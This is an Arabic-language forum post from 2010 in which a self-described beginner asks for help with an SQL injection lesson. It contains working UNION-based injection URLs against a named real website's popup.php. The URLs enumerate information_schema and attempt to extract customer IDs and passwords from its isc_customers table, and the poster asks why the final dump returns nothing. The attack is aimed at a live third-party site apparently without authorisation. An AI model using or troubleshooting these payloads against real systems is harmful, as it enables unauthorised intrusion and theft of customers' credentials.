عرض مشاركة واحدة
قديم 09-25-2010, 04:55 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
Dmar-Qahtan
 
الصورة الرمزية Dmar-Qahtan
 

 

 
إحصائية العضو





Dmar-Qahtan غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dmar-Qahtan is on a distinguished road

افتراضي استفسار بالدرس 8 - 9


السلام عليكم ورحمه الله بركاته

كيف الحال ياشباب ..

اسف على كثرة اسالتي لكن مبتداء بـ sql وياليت تتحملون شوي

وقفت ياشباب عند استخراج اليوزر والباس بورد ..

اول شي طلعت عامود الباسبورد بهذا الامر :

كود PHP:
http://www.veselia.ro/popup.php?sbpic_id=-21%20union%20select%201,2,3,concat%28table_name,0x3a,column_name,0x3a,table_schema%29,5,6,7,8,9,10,11+from+information_schema.columns+where+column_name+like+CHAR%2837,%20112,%2097,%20115,%20115,%2037%29-- 

ومن ثم طلع لي هذولي : ( isc_customers:custpassword:veseliar_foodrom )

واعتقد ان عامود الباسبورد هو : custpassword

ملاحظه : ( اذا خطأ عامود الباس ) علموني

والحين جاء اني استخررج عامود اليوزر ..

بهذا الامر : +where+column_name+like+ وكلمه باس بحط بداله isc_customers

بس مشفرره من موقع : http://www.waraxe.us/sql-char-encoder.html

يعني يصير كذا بالكامل :

كود PHP:
http://www.veselia.ro/popup.php?sbpic_id=-21%20union%20select%201,2,3,concat%28table_name,0x3a,column_name,0x3a,table_schema%29,5,6,7,8,9,10,11+from+information_schema.columns+where+table_name=0x6973635f637573746f6d657273-- 

وطلع لي التالي : ( isc_customers:customerid:veseliar_foodrom )

واعتقد ان عامود اليوزر هو : customerid

ملاحظه : ( اذا فيه غلط ياليت تنبيه )


الحين اعتقد شغلي للحين صح لكن

الحين ناخذ عامود اليوزر هذا customerid ، ونحطه بدال table_name,0x3a,column_name

وعامود الباسبورد هذا custpassword ، نحطه بدال table_schema

ونمسح امر استخراج اليوزر .. ونحط بداله اسم الجدول الي هو هذا isc_customers

يعني يصير كذا بالاخير :

كود PHP:
http://www.veselia.ro/popup.php?sbpic_id=-21%20union%20select%201,2,3,concat%28customerid,0x3a,custpassword%29,5,6,7,8,9,10,11+from+isc_customers-- 
يوم اضغط انتر ماتطلع لي لا اليوزر ولا الباسبورد

وش المشكله ياشباب .. اتمنى اعرف الاجابه

اعتقد ان شغلي كله صحيح وماشي ع السليم

اتمنى الي عنده االاجابه لايبخل بها تكفوون ،


بـأنتظاركم


hsjtshv fhg]vs 8 - 9